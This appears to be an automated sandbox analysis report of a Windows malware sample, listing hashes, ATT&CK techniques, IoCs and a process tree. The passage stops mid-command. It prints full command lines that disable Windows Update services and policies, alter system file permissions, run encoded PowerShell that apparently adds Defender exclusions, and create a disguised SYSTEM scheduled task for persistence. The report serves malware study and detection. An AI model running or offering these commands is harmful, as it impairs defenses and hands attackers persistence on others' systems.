e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2

General

Target

e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
Size

5.3MB
MD5

52fdd7f3ed1b50bc5794983a37cb4064
SHA1

4a185751e9e94dccb3330ca79f893de7ca080482
SHA256

e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
SHA512

4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Executes dropped EXE 1 IoCs

Processes:

services.exe

pid process

1632 services.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3964 takeown.exe
2840 icacls.exe
2736 takeown.exe
872 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3964 takeown.exe
2840 icacls.exe
2736 takeown.exe
872 icacls.exe

pid	process
1632	services.exe

pid	process
3964	takeown.exe
2840	icacls.exe
2736	takeown.exe
872	icacls.exe

pid	process
3964	takeown.exe
2840	icacls.exe
2736	takeown.exe
872	icacls.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1148 set thread context of 1344 1148 conhost.exe conhost.exe

description	pid	process	target process
PID 1148 set thread context of 1344	1148	conhost.exe	conhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Program Files\Windows\services.exe	conhost.exe
File opened for modification	C:\Program Files\Windows\services.exe	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1340 schtasks.exe

pid	process
1340	schtasks.exe

Modifies data under HKEY_USERS 52 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
2328	reg.exe
3464	reg.exe
644	reg.exe
3212	reg.exe
3860	reg.exe
4048	reg.exe
3812	reg.exe
1752	reg.exe
4028	reg.exe
2136	reg.exe
2176	reg.exe
1108	reg.exe
1812	reg.exe
1688	reg.exe
1020	reg.exe
2848	reg.exe
2352	reg.exe
2204	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exe

pid process

1020 powershell.exe
1020 powershell.exe
1020 powershell.exe
1928 conhost.exe
3868 powershell.exe
3868 powershell.exe
3868 powershell.exe
1148 conhost.exe

pid	process
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
1928	conhost.exe
3868	powershell.exe
3868	powershell.exe
3868	powershell.exe
1148	conhost.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

powershell.exetakeown.execonhost.exepowershell.execonhost.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeIncreaseQuotaPrivilege	1020	powershell.exe
Token: SeSecurityPrivilege	1020	powershell.exe
Token: SeTakeOwnershipPrivilege	1020	powershell.exe
Token: SeLoadDriverPrivilege	1020	powershell.exe
Token: SeSystemProfilePrivilege	1020	powershell.exe
Token: SeSystemtimePrivilege	1020	powershell.exe
Token: SeProfSingleProcessPrivilege	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: SeCreatePagefilePrivilege	1020	powershell.exe
Token: SeBackupPrivilege	1020	powershell.exe
Token: SeRestorePrivilege	1020	powershell.exe
Token: SeShutdownPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeSystemEnvironmentPrivilege	1020	powershell.exe
Token: SeRemoteShutdownPrivilege	1020	powershell.exe
Token: SeUndockPrivilege	1020	powershell.exe
Token: SeManageVolumePrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: 34	1020	powershell.exe
Token: 35	1020	powershell.exe
Token: 36	1020	powershell.exe
Token: SeTakeOwnershipPrivilege	3964	takeown.exe
Token: SeDebugPrivilege	1928	conhost.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	3868	powershell.exe
Token: SeIncreaseQuotaPrivilege	3868	powershell.exe
Token: SeSecurityPrivilege	3868	powershell.exe
Token: SeTakeOwnershipPrivilege	3868	powershell.exe
Token: SeLoadDriverPrivilege	3868	powershell.exe
Token: SeSystemtimePrivilege	3868	powershell.exe
Token: SeBackupPrivilege	3868	powershell.exe
Token: SeRestorePrivilege	3868	powershell.exe
Token: SeShutdownPrivilege	3868	powershell.exe
Token: SeSystemEnvironmentPrivilege	3868	powershell.exe
Token: SeUndockPrivilege	3868	powershell.exe
Token: SeManageVolumePrivilege	3868	powershell.exe
Token: SeDebugPrivilege	1148	conhost.exe
Token: SeTakeOwnershipPrivilege	2736	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.execonhost.execmd.execmd.execmd.execmd.exeservices.execonhost.execmd.exe

description	pid	process	target process
PID 1352 wrote to memory of 1928	1352	e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe	conhost.exe
PID 1352 wrote to memory of 1928	1352	e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe	conhost.exe
PID 1352 wrote to memory of 1928	1352	e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe	conhost.exe
PID 1928 wrote to memory of 3500	1928	conhost.exe	cmd.exe
PID 1928 wrote to memory of 3500	1928	conhost.exe	cmd.exe
PID 3500 wrote to memory of 1020	3500	cmd.exe	powershell.exe
PID 3500 wrote to memory of 1020	3500	cmd.exe	powershell.exe
PID 1928 wrote to memory of 1820	1928	conhost.exe	cmd.exe
PID 1928 wrote to memory of 1820	1928	conhost.exe	cmd.exe
PID 1820 wrote to memory of 232	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 232	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 192	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 192	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 320	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 320	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 188	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 188	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 2324	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 2324	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 3212	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 3212	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 2204	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 2204	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 4028	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 4028	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 1812	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 1812	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 3860	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 3860	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 3964	1820	cmd.exe	takeown.exe
PID 1820 wrote to memory of 3964	1820	cmd.exe	takeown.exe
PID 1820 wrote to memory of 2840	1820	cmd.exe	icacls.exe
PID 1820 wrote to memory of 2840	1820	cmd.exe	icacls.exe
PID 1928 wrote to memory of 1108	1928	conhost.exe	cmd.exe
PID 1928 wrote to memory of 1108	1928	conhost.exe	cmd.exe
PID 1108 wrote to memory of 1340	1108	cmd.exe	schtasks.exe
PID 1108 wrote to memory of 1340	1108	cmd.exe	schtasks.exe
PID 1928 wrote to memory of 512	1928	conhost.exe	cmd.exe
PID 1928 wrote to memory of 512	1928	conhost.exe	cmd.exe
PID 512 wrote to memory of 3616	512	cmd.exe	schtasks.exe
PID 512 wrote to memory of 3616	512	cmd.exe	schtasks.exe
PID 1632 wrote to memory of 1148	1632	services.exe	conhost.exe
PID 1632 wrote to memory of 1148	1632	services.exe	conhost.exe
PID 1632 wrote to memory of 1148	1632	services.exe	conhost.exe
PID 1148 wrote to memory of 1368	1148	conhost.exe	cmd.exe
PID 1148 wrote to memory of 1368	1148	conhost.exe	cmd.exe
PID 1368 wrote to memory of 3868	1368	cmd.exe	powershell.exe
PID 1368 wrote to memory of 3868	1368	cmd.exe	powershell.exe
PID 1820 wrote to memory of 2328	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 2328	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 1688	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 1688	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 2136	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 2136	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 1020	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 1020	1820	cmd.exe	reg.exe
PID 1820 wrote to memory of 2388	1820	cmd.exe	schtasks.exe
PID 1820 wrote to memory of 2388	1820	cmd.exe	schtasks.exe
PID 1820 wrote to memory of 224	1820	cmd.exe	schtasks.exe
PID 1820 wrote to memory of 224	1820	cmd.exe	schtasks.exe
PID 1820 wrote to memory of 220	1820	cmd.exe	schtasks.exe
PID 1820 wrote to memory of 220	1820	cmd.exe	schtasks.exe
PID 1820 wrote to memory of 3512	1820	cmd.exe	schtasks.exe
PID 1820 wrote to memory of 3512	1820	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
"C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
3⤵
- Suspicious use of WriteProcessMemory
PID:3500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:232

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:192

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:320

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:188

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:2324

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:3212

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:2204

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:4028

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1812

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:3860

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2840

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2328

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1688

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2136

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1020

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:2388

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:224

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:220

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:3512

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:2288

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2272

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:3632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
4⤵
- Creates scheduled task(s)
PID:1340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
- Suspicious use of WriteProcessMemory
PID:512

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:3616

C:\Program Files\Windows\services.exe
"C:\Program Files\Windows\services.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
3⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change 